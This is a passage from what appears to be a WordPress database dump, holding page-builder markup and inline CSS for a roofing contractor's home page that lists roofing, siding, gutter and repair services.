style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-900cc149-4ce4-480a-b809-9965902c3d14.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-900cc149-4ce4-480a-b809-9965902c3d14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-900cc149-4ce4-480a-b809-9965902c3d14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-900cc149-4ce4-480a-b809-9965902c3d14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-900cc149-4ce4-480a-b809-9965902c3d14.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-900cc149-4ce4-480a-b809-9965902c3d14 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-900cc149-4ce4-480a-b809-9965902c3d14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-900cc149-4ce4-480a-b809-9965902c3d14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-900cc149-4ce4-480a-b809-9965902c3d14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"97bb4af3-b9f2-4900-a022-a0913b0c7b78\"} -->\n<style type=\"text/css\"> .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"acd473cb-3709-457f-9421-929321d17166\"} -->\n<style type=\"text/css\"> .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-acd473cb-3709-457f-9421-929321d17166\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"4776dbfd-a2f7-456a-b568-581c1d04c6c0\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-4776dbfd-a2f7-456a-b568-581c1d04c6c0\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Guaranteed</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"1e53268c\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Roofing\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Siding\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Gutters\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Repairs\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-1e53268c skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-1e53268c {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-1e53268c .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-1e53268c .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-1e53268c .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-1e53268c .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"40ca82c9\",\"title\":\"Roofing\",\"content\":\"With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-40ca82c9 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Roofing</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>With Mike or Justin on every job you can be sure to receive quality that cannot be beat.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"a081008d\",\"title\":\"Siding\",\"content\":\"Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-a081008d gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Siding</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"c015ecde\",\"title\":\"Gutters\",\"content\":\"As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-c015ecde gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Gutters</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"8f9f148e\",\"title\":\"Repairs\",\"content\":\"We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-8f9f148e gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Repairs</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"e968bd23-7521-4da1-a172-0c209a166104\"} -->\n<style type=\"text/css\"> .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e968bd23-7521-4da1-a172-0c209a166104\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-autosave-v1','','','2022-08-25 00:19:10','2022-08-25 00:19:10','',336,'https://cteisys.com/?p=500',0,'revision','',0),(386,1,'2022-08-22 20:05:38','2022-08-22 20:05:38','','32926267_2062360403778390_9097229843803668480_n','','inherit','','closed','','32926267_2062360403778390_9097229843803668480_n','','','2022-08-22 20:05:38','2022-08-22 20:05:38','',336,'https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg',0,'attachment','image/jpeg',0),(387,1,'2022-08-22 20:09:07','2022-08-22 20:09:07','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"f038c729-2cb3-48e6-a5f7-7ce0526e1314\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image 